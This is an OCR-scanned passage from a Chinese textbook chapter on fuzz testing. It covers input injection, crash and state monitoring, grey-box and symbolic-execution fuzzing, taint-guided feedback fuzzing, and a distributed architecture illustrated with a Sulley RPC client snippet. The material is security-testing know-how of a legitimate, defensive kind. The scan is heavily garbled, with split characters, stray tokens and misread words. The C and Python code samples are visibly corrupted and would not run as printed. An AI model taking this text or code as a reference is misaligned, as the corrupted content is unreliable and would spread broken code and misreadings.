后 还 需要 将 网 络 连接 断 开 ,避免 过 多 的 连接 造成 其 他 干扰 。 另 外 ,多 次 测试 之 间 应 该 考虑 
时 间 间 隔 和 发 包 数 量 ,避免 被 目标 识别 为 DDoS 攻击 加 入 黑 名 单 。 当 然 , 如 果 测 试 对 象 部 
署 在 模糊 测试 系统 内 部 ,并 且 能 被 模糊 测试 系统 所 控制 时 ,可 以 通过 配置 消除 这 些 影响 。 

另外 ,网 络 数据 的 输入 环境 较为 复杂 ,需要 考虑 复杂 的 网 络 环境 ,除了 网 络 地 址 、 端 口 
信息 之 外 还 需 考虑 多 次 交互 的 情况 ,测试 对 象 提 供 服务 的 过 程 可 能 需要 与 环境 控制 模块 
进行 多 次 交互 ,此 时 环境 控制 模块 首先 将 交互 过 程 状态 与 测试 对 象 返回 的 数据 提交 给 数 
据 生 成 模块 ,数据 生成 模块 根据 环境 控制 模块 提交 的 状态 与 数据 结合 多 阶段 数据 类 型 的 
描述 ,生成 下 一 阶段 的 数据 。 通 过 这 一 过 程 ,模糊 测试 系统 能 够 针对 测试 对 象 提供 的 网 络 
服务 与 业务 流程 进行 深入 的 测试 。 比 如 FTP 服务 器 需要 登录 授权 ,SMTP 或 者 POP3 等 
邮件 协议 也 需要 登录 ,网 络 数据 输入 技术 需要 根据 测试 目标 的 特性 定制 数据 输入 过 程 。 

2) 文件 数据 输入 技术 

当 测试 对 象 的 输入 与 输出 主要 以 文件 作为 载体 时 ,环境 控制 模块 需要 将 文件 输入 到 
测试 对 象 。 环 境 控制 模块 将 文件 输入 到 测试 对 象 主要 有 两 种 方式 : 一 种 是 在 测试 对 象 启 
动 时 ,将 文件 路 径 作 为 命令 行 参数 传递 给 测试 对 象 ; 另 一 种 是 在 测试 对 象 已 经 启动 的 情况 
下 ,通过 进程 间 交互 机 制 控制 测试 对 象 进程 打 开 目标 文件 。 

在 前 一 种 方式 中 ,最 常见 的 方式 是 通过 构建 包含 测试 对 象 路 径 与 目标 文件 路 径 的 命 
AE TB ,并 调用 cmd shell 等 程序 执行 该 字符 串 。 该 方式 简单 灵活 ,能 够 处 理 大 部 分 文 
件 目标 输入 到 测试 对 象 的 情况 。 如 果 在 模糊 测试 过 程 中 不 希望 出 现 大 量 的 cmd 进程 ,也 
可 以 直接 利用 CreateProcess 系列 API 直接 创建 测试 对 象 进程 ,并 将 目标 文件 作为 参数 
传递 给 测试 对 象 进程 。 此 外 ,还 可 以 利用 操作 系统 的 默认 打开 方式 机 制 调用 测试 对 象 打 
开 目 标 文件 ,该 过 程 可 以 用 鼠标 双击 事件 触发 ,也 可 以 用 Python 的 os. startfile 方法 
启动 。 

后 一 种 方式 需要 根据 测试 对 象 的 实际 情况 定制 控制 方式 。 如 果 测 试 对 象 支持 COM 
接口 ,环境 控制 模块 可 以 通过 COM 接口 控制 目标 对 象 打 开 目 标 文件 。 如 果 测 试 对 象 有 
自己 的 窗口 ,并 且 提 供 了 图 形 化 的 界面 支持 文件 打开 功能 ,环境 控制 模块 可 以 尝试 通过 向 
测试 对 象 进程 发 送 消 息 的 方式 将 目标 文件 输入 给 测试 对 象 。 此 外 ,环境 控制 模块 还 可 以 
采用 模拟 用 户 操 作 发 送 系 统 消息 、 直 接 调 用 测试 对 象 中 相应 的 函数 等 方式 将 目标 文件 输 
入 给 测试 对 象 。 

3) 外 设 输入 技术 

许多 软件 包含 图 形 界面 ,模糊 测试 系统 也 可 以 通过 设计 合适 的 输入 数据 与 数据 交互 
模式 通过 软件 的 图 形 界面 对 软件 功能 进行 测试 。 输 入 用 户 操作 包括 键盘 操作 和 鼠标 操 
JE ,键盘 输入 包括 字符 (字母 数字、 标 点 、 空 格 ) 输 入 控制 键 输入 (Shift\CtrlD)、 删 除 键 . 方 
向 键 等 ,鼠标 操作 包括 左 \ 中 ,右键 的 单 击 、 双 击 操作 以 及 位 置 的 移动 ,这 些 输 入 可 以 通过 
模拟 输入 实现 ,Windows 为 这 些 操作 提供 了 相应 的 API 接口 。 

另外 ,鼠标 和 键盘 输入 的 序列 需要 预定 义 变 异 规则 ,包括 字符 序列 、 点 击 次 数 、 控 制 时 
间 差 以 区 分 单 击 双击 。 而 且 输 入 的 位 置 需要 对 界面 的 编辑 框 位 置 、 大 小 范围 或 者 唯一 标 
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识 进行 识别 ,以 得 到 正确 的 输入 对 象 ,避免 张冠李戴 ,这些 需要 遍历 Windows 操作 系统 的 
窗口 ,识别 窗口 所 属 进程 .窗口 类 型 等 进行 筛选 ,当然 需要 前 期 的 分 析 基 础 作为 判别 依据 。 

4) 内 存 修改 技术 

内 存 修改 技术 应 用 于 内 存 Fuzz, 其 目标 是 为 了 提高 模块 测试 的 速度 与 针对 性 。 环 境 
控制 模块 通过 直接 修改 测试 对 象 执行 过 程 中 的 内 存 状 态 ,使 得 模糊 测试 可 以 避免 那些 每 
次 测试 过 程 中 测试 对 象 都 会 执行 的 ,但 又 不 存在 漏洞 或 者 不 是 用 户 感 兴趣 的 执行 过 程 , 从 
而 提高 模糊 测试 的 效率 。 修 改 内 存 时 ,将 控制 进程 附加 到 被 测 对 象 进程 ,获取 进程 内 存 的 
读 写 权限 (可 以 是 修改 进程 内 存 的 读 写 属 性 ) ,识别 出 敏感 的 内 存 位置 , 对 特定 内 存 位 置 的 
数据 进行 变异 作为 畸形 输入 。 内 存 的 修改 有 现成 的 技术 ,保存 运行 现场 用 于 变异 后 的 多 
份 数据 测试 ,识别 内 存 中 的 敏感 位 置 .变异 后 的 内 存 如 何 与 程序 启动 前 的 状态 和 输入 建立 
联系 是 内 存 Fuzz 面临 的 难点 。 


模糊 测试 系统 在 执行 模糊 测试 时 需要 对 测试 对 象 的 生命 周期 、 执 行 状态 .异常 状态 与 
输入 输出 进行 监控 。 对 测试 对 象 进 行 监控 主要 的 目的 是 判断 测试 对 象 是 否 出 现 异常 ,如 
果 出 现 异常 , 则 保存 异常 状态 与 异常 对 应 的 输入 数据 与 环境 状态 。 此 外 ,对 程序 运行 过 程 
中 的 状态 进行 监控 还 可 以 指导 环境 控制 模块 对 测试 环境 与 测试 对 象 进行 更 准确 的 控制 ， 
或 者 指导 数据 生成 模块 生成 更 有 效率 的 测试 数据 。 根 据 监控 类 型 的 不 同 , 状 态 监控 所 采 
用 的 技术 可 以 分 为 生命 周期 监控 技术 ,输入 输出 监控 技术 和 执行 状态 监控 技术 。 

1. 生命 周期 监控 技术 

在 模糊 测试 过 程 中 ,测试 对 象 接收 输入 的 测试 数据 必须 满足 如 下 条 件 : 测试 进程 完 
成 了 必要 的 初始 化 过 程 , 并 且 没 有 处 于 僵 死 状态 。 这 需要 状态 监控 模块 对 测试 对 象 的 生 
命 周期 进行 监控 ,在 6. 3. 2 节 关 于 环境 控制 模块 的 介绍 中 ,可 以 发 现 测 试 对 象 一 般 作 为 环 
境 控制 模块 的 子 进 程 或 者 子孙 进程 被 启动 ,因此 环境 控制 模块 能 够 获得 测试 对 象 的 进程 
句柄 ,通过 该 句柄 状态 控制 模块 可 以 判断 进程 (Linux) 或 进程 主线 程 (Windows) 的 运行 状 
态 。 通 过 进程 句柄 获得 的 进程 或 进程 主线 程 运 行 状态 只 能 指示 测试 对 象 是 否 正在 运行 、 
等 待 或 已 经 僵 死 ,不 能 指示 测试 对 象 是 否 已 经 完成 初始 化 准备 工作 并 开始 正常 提供 服务 。 
此 时 ,状态 监控 模块 可 以 根据 测试 对 象 的 实际 情况 选择 监控 技术 。 

当 测 试 对 象 对 外 提供 网 络 服务 时 ,状态 监控 模块 可 以 发 送 预先 设置 的 数据 包 , 根 据 返 
回 的 信息 (如 错误 码 等 ) 判 断 测 试 对 象 是 否 已 经 正常 运行 。 当 测试 对 象 提供 了 COM 接口 
时 ,环境 控制 模块 会 采用 Coinitialize 方式 实现 对 测试 对 象 进程 的 同步 ,在 同步 过 程 完 成 
后 ,环境 控制 模块 能 够 通过 COM 接口 判断 测试 对 象 当 前 的 状态 。 此 外 .如果 环 境 控制 模 
块 在 启动 测试 对 象 进程 时 获得 了 调试 权限 ,状态 监控 模块 可 以 通过 操作 系统 或 硬件 提供 
的 调试 接口 获取 测试 对 象 当前 所 处 的 状态 。 

监控 测试 对 象 的 生命 周期 除了 可 以 判断 软件 是 否 处 于 正常 的 运行 状态 下 ,还 可 以 判 
断 程序 是 否 出 现 异常 。 大 部 分 软件 在 开始 运行 后 不 会 自动 终止 ,直到 它 收 到 终止 命令 或 
遇 到 不 能 处 理 的 异常 。 因 此 ,监控 测试 对 象 的 生命 周期 可 以 判断 它 是 否 出 现 了 异常 。 事 
实 上 这 种 方法 简单 易 行 并 且 很 有 效 。 
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2. 输入 输出 监控 技术 


获取 程序 生命 周期 状态 信息 可 以 支持 对 测试 对 象 的 基本 控制 ,但 是 如 果 想 了 解 测试 
对 象 功能 流 对 程 所 处 的 阶段 ,需要 对 测试 对 象 的 行为 进行 更 细 粒 度 的 监控 。 程 序 的 输入 
与 输出 主要 通过 异步 过 程 与 系统 提供 的 L/O 设备 (包含 文件 ) 进 行 交互 ,对 程序 的 输入 输 
出 进行 监控 简单 易 行 ,方法 通用 性 较 好 ,同时 不 会 影响 程序 的 执行 过 程 ,因此 得 到 了 广泛 
的 应 用 。 

与 程序 输入 输出 相关 的 I/O 设备 包含 网 卡 、 打 印 机 、 磁 盘 等 。 在 Windows 下 ,这 些 设 
备 被 分 类 为 字符 设备 与 块 设备 ,并 提供 了 统一 的 硬件 驱动 层 屏蔽 设备 之 间 的 差异 。 在 
Linux 下 ,这 些 IO 设备 被 统一 视 作 文件 ,并 用 统一 的 文件 系统 进行 管理 。 在 这 里 ,以 
Windows 下 狭义 的 文件 为 例 介 绍 监 控 程 序 输入 输出 的 方法 ,这 些 方法 在 很 多 情况 下 同样 
适用 于 Linux 下 的 文件 系统 。 

异常 处 理 是 现代 软件 先进 性 的 重要 体现 ,程序 在 遇 到 异常 时 一 般 会 生成 一 个 骨 溃 文 
件 记录 此 次 崩溃 的 一 些 关键 信息 ,或 者 会 向 日 志文 件 中 添加 记录 。 程 序 生 成 的 崩溃 文件 
一 般 在 固定 的 位 置 , 并 且 文 件 名 满足 一 定 的 约定 。 因 此 ,环境 监控 模块 可 以 根据 崩溃 文件 
创建 的 时 间 判 断 测试 对 象 是 否 出 现 了 新 的 骨 溃 ,并 且 通 过 估计 确定 对 应 输入 数据 的 可 能 
范围 。 

当 测 试 对 象 的 输出 包含 日 志文 件 时 ,状态 监控 文件 可 以 通过 轮 询 的 方式 读 取 日 志文 
件 最 新 的 记录 ,获取 测试 对 象 的 运行 状态 ,其 中 包括 异常 的 相关 信息 。 当 测试 对 象 遇 到 严 
重 错误 导致 该 异常 没有 记录 时 ,可 以 通过 访问 Windows 或 Linux 系统 日 志 判 断 是 否 出 现 
异常 。 值 得 注意 的 是 , Windows 操作 系统 与 Linux 操作 系统 都 包含 多 种 系统 日 志 , 通 过 
对 这 些 日 志 信息 的 解析 ,可 以 得 到 测试 对 象 运行 状态 、 网 络 流量 等 方面 的 信息 。 

除了 对 文件 进行 监控 外 ,状态 监控 模块 还 可 以 对 注册 表 、 网 络 流量 、 系 统 Dump 文件 
等 进行 监控 ,监控 的 粒度 可 以 根据 测试 对 象 的 实际 情况 与 测试 目标 决定 。 

3. 执行 状态 监控 技术 

当 模 糊 测试 系统 发 现 了 测试 对 象 发 生 骨 溃 时 ,分 析 人 员 可 能 已 经 厌烦 了 对 大 量 的 引 
发 崩溃 的 测试 数据 采用 人 工 调 试 的 方式 进行 进一步 分 析 , 此 时 需要 对 测试 对 象 的 骨 溃 进 
行 初 步 的 分 析 与 处 理 。 这 需要 对 测试 对 象 骨 溃 进行 初步 的 筛选 ,崩溃 发 生 时 测试 对 象 的 
执行 状态 信息 有 助 于 对 程序 崩溃 进行 初步 筛选 。 

崩溃 发 生 时 程序 的 运行 时 栈 包 含 了 大 量程 序 状 态 信息 , 状 态 监控 模块 通过 异常 捕获 
技术 与 调试 技术 等 状态 监控 技术 提取 程序 崩溃 时 栈 的 数据 结构 .寄存 器 状态 .异常 链 等 信 
息 ,为 测试 用 例 的 筛选 提供 支持 。 图 6-10 描述 了 在 调试 状态 下 Windows 7 操作 系统 异常 
相关 的 数据 结构 。 

此 外 ,状态 监控 模块 提取 的 执行 状态 信息 能 够 支持 对 程序 执行 逻辑 的 深入 分 析 , 分 析 
的 结果 能 够 指导 数据 生成 模块 生成 更 有 针对 性 的 测试 数据 。 例 如 ,具备 自 反 馈 能 力 的 模 
糊 测试 就 需要 使 用 此 项 技术 。 
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typedef struct. DEBUG, EVENT ( typedef struct. EXCEPTION DEBUG INFO ( 
DWORD dwDebugEventCode; EXCEPTION RECORD ExceptionRecord; 
DWORD dwProcessld; DWORD dwFirstChance; 
DWORD dwThreadld; ) EXCEPTION, DEBUG INFO, \ 
union ( *LPEXCEPTION DEBUG INFO; 
EXCEPTION DEBUG INFO Exception; 
CREATE, THREAD DEBUG INFO CreateThread; 
CREATE, PROCESS DEBUG INFO CreateProcessInfo; typedef struct. EXCEPTION, RECORD ( pm 
EXIT THREAD DEBUG INFO ExitThread; DWORD ErceptionCode 
EXIT PROCESS DEBUG INFO ExitProcess; ExceptionFlags; struct 
LOAD DLL DEBUG INFO LoadDll; EXCEPTION ] RECORD "ExceptionRecord; 
UNLOAD DLL DEBUG INFO UnloadDll; PVOID ExceptionAddress, 
OUTPUT DEBUG STRING INFO DebugString; DWORD NumberParameters; 
RIP. INFO RipInfo; ULONG, PTR ExceptionInformation 
)u [EXCEPTION MAXIMUM. PARAMETERS]; 
) DEBUG EVENT, *LPDEBUG EVENT, ) EXCEPTION. RECORD, *PEXCEPTION, RECORD; 











Æ 6-10 Windows 7 异常 调试 数据 结构 


6.4 模糊 测试 优化 方法 


传统 的 模糊 测试 采用 黑 盒 测 试 的 思想 ,其 数据 生成 策略 仅 将 输入 接口 的 语法 作为 测 
试 数据 生成 的 依据 ,其 优势 是 不 需要 了 解 程序 内 部 的 执行 过 程 ,但 效率 较 低 。 现 有 软件 安 
全 性 分 析 的 研究 已 经 将 多 项 综合 技术 方法 与 模糊 测试 结合 起 来 ,并 取得 了 较 好 的 效果 ,这 
些 优化 方法 包括 灰 盒 模糊 测试 、 混 合 符号 执行 、 基 于 反馈 的 模糊 测试 ,其 优化 思路 都 是 以 
路 径 覆 盖 率 为 指导 ,降低 生成 测试 用 例 的 元 余 度 ,减少 等 价 测试 用 例 数量 。 
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灰 盒 模糊 测试 方法 是 通过 逆向 分 析 程 序 二 进 制 代码 和 输入 数据 的 标准 格式 ,生成 有 
针对 性 的 违背 数据 格式 规范 的 测试 数据 ,从 而 提高 模糊 测试 的 效率 。 评 价 模糊 测试 效率 
的 一 个 关键 指标 是 路 径 柳 盖 率 , 灰 盒 模糊 测试 通过 分 析 程 序 二 进 制 代码 为 每 条 执行 路 径 
设计 唯一 的 测试 用 例 , 能 够 以 最 少 的 代价 覆盖 程序 全 部 可 达 路 径 代码 ,通过 生成 每 一 类 的 
违反 数据 格式 规范 的 数据 ,能 够 有 针对 性 地 测试 程序 对 每 一 类 违例 输入 的 错误 处 理 能 力 。 

灰 盒 模糊 测试 的 主要 功能 原理 如 图 6-11 所 示 , 尽 管 没有 程序 源 代码 ,对 程序 的 二 进 
制 代 码 进行 反 汇编 得 到 的 汇编 语言 也 能 揭示 程序 的 执行 细节 以 及 程序 的 输入 输出 ,通过 
静态 逆向 分 析 、 动 态 污点 传播 分 析 的 结合 ,可 以 恢复 一 定 的 输入 数据 格式 ,在 格式 语义 上 
能 够 限定 敏感 字段 进行 有 针对 性 的 测试 。 另 外 ,通过 逆向 分 析 可 以 获得 部 分 敏感 字段 的 
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图 6-11 灰 盒 模糊 测试 功能 原理 
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边界 取 值 ,在 畸形 数据 生成 过 程 中 可 以 指导 字段 的 变异 取 值 ,包括 边界 内 、 边 界 、 边 界外 的 
字段 取 值 。 

通过 程序 预 分 析 的 方法 能 够 限定 变异 字段 的 范围 ,以 及 优化 字段 变异 的 取 值 范围 , 降 
低 样本 空间 的 容量 ,从 而 提高 模糊 测试 的 效率 。 例 如 ,针对 bmp 样本 格式 ,变异 字段 应 该 
重点 关注 文件 格式 头 , 包 括 属 性 ,长 . 宽 、 版 本 等 具有 逻辑 意义 的 字段 ,而 其 中 的 rgb 像素 
点 数据 并 非 关 注 的 重点 ,只 需 做 少许 变异 进行 测试 。 再 如 ,通过 逆向 分 析 得 到 cmp eax, 8 
这 类 比较 指令 , 且 发 现 输入 与 eax 相等 ,那么 对 于 输入 应 该 分 为 负数 、[0, 7]、8、 大 于 8 这 
4 种 情况 ,每 种 情况 可 取 两 个 值 进行 测试 ,无 须 遍 历 所 有 可 能 值 。 当 然 其 中 如 果 涉 及 更 复 
杂 的 运算 和 多 项 逻辑 组 合 , 简 单 的 逆向 分 析 难 以 满足 需求 ,可 以 结合 混合 符号 执行 。 
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符号 执行 已 在 前 面 章节 有 所 介绍 ,结合 符号 执行 的 技术 方法 可 以 提高 模糊 测试 的 效 
率 。 通 过 静态 分 析 能 够 获得 输入 中 敏感 字段 的 位 置 ,而 字段 的 取 值 除了 遍历 和 随机 取 值 
之 外 ,还 可 以 通过 符号 执行 的 方法 进行 优化 。 通 过 分 析 程 序 指令 ,将 程序 中 内 存 与 寄存 器 
的 值 表示 为 输入 变量 的 表达 式 , 然 后 联 立 每 个 分 支 语 句 所 代表 的 约束 表达 式 , 再 用 符号 执 
行 技术 求 出 程序 执行 各 路 径 分 支 的 一 个 满足 条 件 的 测试 用 例 。 通 过 这 些 测 试用 例 ,模糊 
测试 系统 可 以 更 多 地 覆盖 程序 的 各 个 代码 分 支 ,在 减少 测试 用 例 的 同时 提高 代码 覆盖 率 。 
这 种 方法 也 称 为 白 盒 模糊 测试 。 

符号 执行 的 符号 表达 式 可 以 通过 静态 分 析 提 取 , 也 可 以 在 动态 运行 过 程 中 对 程序 代 
码 进 行 插 桩 分 析 , 提 取 表 达 式 和 约 东 条件。 静态 分 析 更 适用 于 模块 内 的 分 析 , 跨 模块 的 分 
析 可 能 面临 数据 关系 建立 难题 ,比如 call eax 这 类 调用 ,需要 预测 调用 的 具体 函数 才能 建 
立 模块 间 的 数据 关系 ,而 且 部 分 未 被 符号 化 的 内 存 和 寄存 器 的 值 无 法 在 静态 分 析 中 获取 ， 
加 大 了 表达 式 求解 的 难度 。 通 过 在 动态 执行 过 程 中 进行 代码 插 桩 ,提取 表达 式 和 约束 条 
件 进行 求解 是 可 行 性 比较 高 的 一 种 方案 ,通过 对 当前 路 径 分 支 条 件 取 反 的 方式 构造 新 的 
测试 数据 。 由 于 程序 的 执行 路 径 由 程序 的 分 支 条 件 决定 ,如 ifCinput[ 0] — — bo ifi Ai 
input[0j 是 否 为 b 决 定 了 程序 下 一 条 指令 是 否 被 执行 ,将 全 部 分 支 语 句 的 约束 联 立 起 来 ， 
就 能 求解 出 当前 执行 路 径 的 输入 数据 需要 满足 的 条 件 。 当 改变 了 某 个 分 支 的 约束 后 ,就 
能 得 到 另 一 条 路 径 执行 时 输入 数据 需要 满足 的 约束 ,依次 改变 程序 的 分 支 条 件 ,就 能 遍历 
程序 所 有 路 径 ,这 种 方法 也 被 Patrice Godefroid 称 为 flip 方法 ,图 6-12 即 他 在 论文 中 给 
出 的 基本 原理 图 。 

对 于 函数 top 来 说 ,要 遍历 其 所 有 可 能 的 路 径 , 需 要 对 其 4 条 分 支 语 句 依次 进行 flip, 
并 得 到 响应 的 输入 数据 求解 结果 。 图 6-12 描述 了 通过 flip 方法 得 到 能 够 遍历 top. 函数 所 
有 路 径 的 输入 数据 的 过 程 。 

从 上 面 的 描述 中 可 以 看 出 ,flip 方 法 可 以 从 最 后 一 个 分 支 语 句 开 始 翻转 ,也 可 以 从 第 
一 个 分 支 语 句 开 始 翻 转 。 一 般 来 说 ,从 最 后 一 个 分 支 语句 开始 翻转 ,模糊 测试 会 更 有 针对 
性 ,特别 在 我 们 已 经 确定 测试 对 象 某 个 模块 或 者 某 部 分 指令 可 能 存在 问题 的 情况 下 。 但 
是 在 没有 特定 目标 的 情况 下 .采用 从 第 一 个 分 支 开始 翻转 的 方法 也 许 会 有 意外 的 效果 ,有 
兴趣 的 读者 可 以 尝试 分 析 在 采用 这 种 策略 时 图 6-12 中 测试 用 例 生成 的 过 程 是 怎样 的 。 


we 
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void top(char input[4]) { 
int cnt=07 





if (input[0] -- b) cnt++; 
if (input[1] 'a') cnt++; 
if (input[2] 'd') cnt++; 
if (input[3] == '!') cnt++; 
if (cnt >= 3) abort(); // error 
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图 6-12 flip 方法 原理 


值得 注意 的 是 ,如 果 程 序 中 存在 循环 ,并 且 循环 可 能 的 执行 次 数 为 1 一 100 000 次 , 那 
AK HI flip 方法 至 少 要 翻转 100 000 次 才能 遍历 所 有 可 能 路 径 。 因 此 ,采用 flip 方法 的 模 
糊 测试 需要 根据 程序 动态 执行 路 径 识 别 循环 ,并 通过 循环 归纳 变量 将 循环 的 效果 近似 为 
以 循环 次 数 为 参数 的 函数 ,以 简化 flip 过 程 。 

对 程序 执行 路 径 的 约束 进行 求解 是 一 个 十 分 困难 的 事情 ,尽管 新 出 现 的 约束 求解 器 
已 经 能 够 处 理 长 路 径 的 求解 难题 ,但 是 当 程 序 路 径 包 含 的 指令 数量 达到 千 万 、 上 亿 级 别 
时 ,符号 求解 器 也 难以 对 路 径 进 行 求解 。 此 外 ,如 果 程 序 汇编 指令 中 包含 JP、JO 等 与 
EFLAGS 标识 位 有 关 的 指令 时 ,符号 求解 也 十 分 困难 。 一 个 可 行 的 方法 是 对 执行 路 径 中 
部 分 变量 不 进行 符号 化 ,而 用 真实 值 蔡 代 ,这 样 能 大 大 简化 符号 求解 的 过 程 。 这 种 称 为 
Conclic 的 方法 可 能 使 得 部 分 求解 得 到 的 输入 数据 是 错误 的 ,其 并 不 能 使 得 程序 执行 预期 
的 执行 路 径 。 可 以 利用 经 验 尝试 改变 这 些 真 实 值 来 弥补 那些 错过 的 执行 路 径 。 


643 基于 反馈 的 模糊 测试 


模糊 测试 过 程 是 一 个 循环 的 反复 测试 过 程 , 通 过 统计 分 析 前 序 测试 用 例 特征 与 测试 
结果 特征 ,可 以 指导 后 续 测 试 数据 的 生成 ,这 称 为 基于 反馈 的 模糊 测试 方法 。 如 图 6-13 
所 示 , 基 于 反馈 的 模糊 测试 首先 基于 原始 的 输入 数据 进行 测试 ,在 测试 过 程 中 监控 程序 状 
态 ,结合 动态 污点 传播 .混合 动态 符号 执行 等 技术 在 测试 过 程 中 对 流程 进行 分 析 ,甄别 出 
输入 中 的 敏感 字段 ,对 后 续 数 据 的 变异 字段 甚至 字段 变异 取 值 给 出 策略 性 建议 。 另 外 ,也 
可 根据 测试 结果 做 出 反馈 , 当 发 现 修改 相同 的 特定 字段 能 够 造成 大 量 异 常 时 ,尤其 是 只 修 
改 一 个 字段 的 情况 下 ,可 以 终止 该 字段 的 变异 ,因为 该 字段 的 破坏 能 力 已 被 发 现 ,给 出 
100 个 同样 的 崩溃 与 给 出 10 个 的 价值 是 一 样 的 , 跳 过 该 字段 可 以 节省 资源 用 于 发 现 其 他 
位 置 的 故障 。 

通过 污点 传播 和 混合 符号 执行 的 方法 都 可 以 为 模糊 测试 提供 程序 关键 信息 ,用 这 些 
关键 信息 作为 反馈 指导 测试 用 例 的 生成 过 程 。 其 中 ,符号 执行 是 一 个 重量 级 的 方法 ,污点 
传播 是 一 种 提取 程序 关键 数据 流 信息 的 较为 轻 量 级 的 方法 ,通过 该 方法 可 以 知道 某 个 变 
量 和 哪些 输入 数据 相关 。 在 许多 情况 下 ,通过 对 包含 崩溃 的 程序 执行 路 径 进 行 初步 分 析 
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图 6-13 基于 反馈 的 模糊 测试 流程 
能 确定 哪些 变量 与 崩溃 直接 相关 ,然后 再 通过 污点 分 析 可 以 确定 哪些 输入 字段 对 这 些 变 


量 有 影响 ,此 时 可 以 有 针对 性 地 改变 这 些 字 段 , 生 成 更 有 针对 性 的 测试 用 例 。 结 合 污点 传 
播 可 以 构造 出 基于 反馈 的 模糊 测试 系统 ,其 基本 功能 如 图 6-14 所 示 。 
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图 6-14 结合 污点 传播 的 自 反馈 模糊 测试 架构 


图 6-14 中 的 反 汇 编 引擎 可 以 采用 Linux. 下 开源 的 线性 反 汇 编 引擎 bfd 或 者 udis86， 
中 间 语 言 转换 可 以 采用 Valgrind 开源 软件 提供 的 VEX 中 间 语 言 模块 ,污点 传播 引擎 可 
以 采用 开源 软件 BitBlaze, 关 键 字段 确定 需要 结合 污点 源 扩散 影响 到 的 程序 指令 、 控 制 节 
点 进行 筛选 ,虚拟 化 软件 可 以 采用 开源 的 硬件 模拟 器 QEMU ,通过 对 QEMU 的 修改 添加 
状态 监控 功能 ,提取 执行 指令 ,标记 污点 源 信 息 。 


6.5 分 布 式 模糊 测试 


模糊 测试 是 一 种 动态 方法 ,其 测试 过 程 中 需要 测试 对 象 在 真实 环境 中 运行 。 由 于 模 
糊 测试 需要 通过 大 量 的 测试 数据 以 及 相应 的 程序 执行 过 程 发 现 测试 对 象 中 存在 的 漏洞 ， 
因此 其 总 的 时 间 成 本 十 分 高 晶 。 过 去 的 经 验 表 明 ,软件 功能 复杂 性 的 增加 使 得 通过 硬件 
性 能 增长 提高 的 模糊 测试 的 效率 变 得 微不足道 。 解 决 这 个 问题 的 办 法 是 ,模糊 测试 可 以 
同时 测试 多 个 程序 执行 过 程 ,从 而 利用 大 量 的 计算 资源 采用 分 布 式 计 算 的 方式 提高 模糊 
测试 的 效率 。 
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651 分 布 式 控制 结构 


分 布 式 计算 提升 效率 的 关键 因素 是 分 布 式 控制 策略 ,其 基本 的 功能 是 保证 分 布 式 节 
点 不 会 进行 大 量 重复 的 工作 ,在 此 基础 上 再 根据 分 布 式 节点 处 理 能 力 的 区 别 分 配 工作 ,并 
根据 节点 动态 的 变化 进行 自 适应 的 调整 。 分 布 式 计 算 中 ,计算 资源 之 间 的 协作 可 以 采用 
中 心 控制 的 方式 实现 ,也 可 以 通过 P2P 等 非 结构 化 的 方式 实现 。 由 于 P2P 结构 的 分 布 式 
模糊 测试 框架 在 模糊 测试 中 未 见 显 著 优 势 , 本 节 主 要 介绍 中 心 控制 式 的 分 布 式 模糊 测试 
框架 。 

在 分 布 式 模糊 测试 框架 中 ,环境 控制 模块 与 状态 监控 模块 必须 部 署 在 分 布 式 终端 上 ， 
数据 生成 模块 可 以 部 署 在 控制 中 心 ,也 可 以 部 署 在 分 布 式 终端 。 数据 生成 模块 部 署 在 控 
制 中 心 可 以 比较 方便 地 实现 负载 均衡 ,适用 于 测试 数据 不 是 很 大 的 情况 。 数 据 生成 模块 
部 署 在 分 布 式 终端 能 够 处 理 测试 数据 比较 大 的 情况 ,但 是 需要 额外 的 机 制 实现 分 布 式 终 
端的 负载 均衡 。 本 节 主 要 介绍 数据 生成 模块 部 署 在 分 布 式 终端 的 一 种 分 布 式 模糊 测试 杠 
架 ,其 主要 结构 如 图 6-15 Bros 。 



































图 6-15 分 布 式 模糊 测试 架构 


其 中 ,控制 中 心 的 中 心 控制 模块 通过 网 络 与 分 布 式 终端 的 终端 管理 模块 连接 ,然后 由 
终端 管理 模块 控制 数据 生成 模块 .环境 控制 模块 .状态 监控 模块 协同 作业 。 中 心 控制 模块 
主要 包含 3 个 主要 功能 : 测试 过 程 配置 ,测试 状态 监控 ,测试 任务 调度 。 

测试 过 程 配置 主要 包含 测试 过 程 参数 设置 .策略 文件 分 发 ,种子 文 件 分 发 等 。 测 试 过 
程 参数 可 能 包含 心跳 包 频 率 、 状 态 监控 文件 路 径 、 磁 盘 报 警 设置 等 。 策 略 文件 分 发 将 描述 


Sos MU 


数据 生成 策略 与 数据 交互 策略 的 文件 发 布 给 分 布 式 终端 。 如 果 测 试 过 程 需要 种 子 文件 ， 
则 还 需要 将 种 子 文件 分 发 到 各 分 布 式 终端 。 

测试 状态 监控 主要 监控 已 完成 测试 用 例 数量 、 测 试 对 象 崩溃 次 数 、 内 存 与 CPU 使 用 
率 \ 磁 盘 剩 余 空 间 等 信息 。 这 些 信息 可 以 以 心跳 包 的 方式 从 分 布 式 终端 发 送 给 控制 中 心 ， 
心跳 包 还 能 指示 分 布 式 终端 是 否 正 常 运行 。 这 些 状态 信息 反映 了 模糊 测试 过 程 的 状态 与 
进度 ,还 可 以 用 来 作为 测试 任务 调度 的 依据 。 

测试 任务 调度 负责 对 测试 任务 进行 调度 ,各 分 布 式 终端 的 测试 速度 可 能 存在 差异 , 需 
要 对 任务 进行 调度 提高 模糊 测试 总 体 速度 。 此 外 ,分 布 式 终端 可 能 由 于 各 种 原因 失效 ,此 
时 需要 将 该 终端 的 任务 分 配 到 其 他 节点 运行 。 测 试 任务 调度 将 在 6. 5. 3 节 详细 介绍 。 

下 面 以 Sulley 为 例 介 绍 分 布 式 模糊 测试 框架 的 应 用 : 


import sys 
import struct 
import socket 
import cPickle 


class client: 


def getattr (self, method name): 
return lambda * args, * * kwargs: self. method missing (method name, * args, * 
* kwargs) 
def | method missing (self, method name, * args, * * kwargs): 
self.  connect() 
while 1: 
try: 
Self.  pickle send((method name, (args, kwargs))) 
break 
except: 
self. connect () 
ret-self.  pickle recv() 
def | pickle recv (self): 
length-struct.unpack("«L", self. server sock.recv (4)) [0] 
length- strreceived- "" 
while length: 
chunk-self. server sock.recv (length) 
received *- chunk 
length-- len (chunk) 
return cPickle.loads (received) 
def __pickle send(self, data): 
data- cPickle.dumps (data, protocol- 2) 
self.  debug("sending sd bytes" slen (data) ) 
self. server sock.send(struct.pack("«L", len(data))) 


self. server sock.send(data) 
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Sulley 通过 RPC(Remote Procedure Call) 协 议 实 现 控制 中 心 对 分 布 式 终端 的 控制 ， 
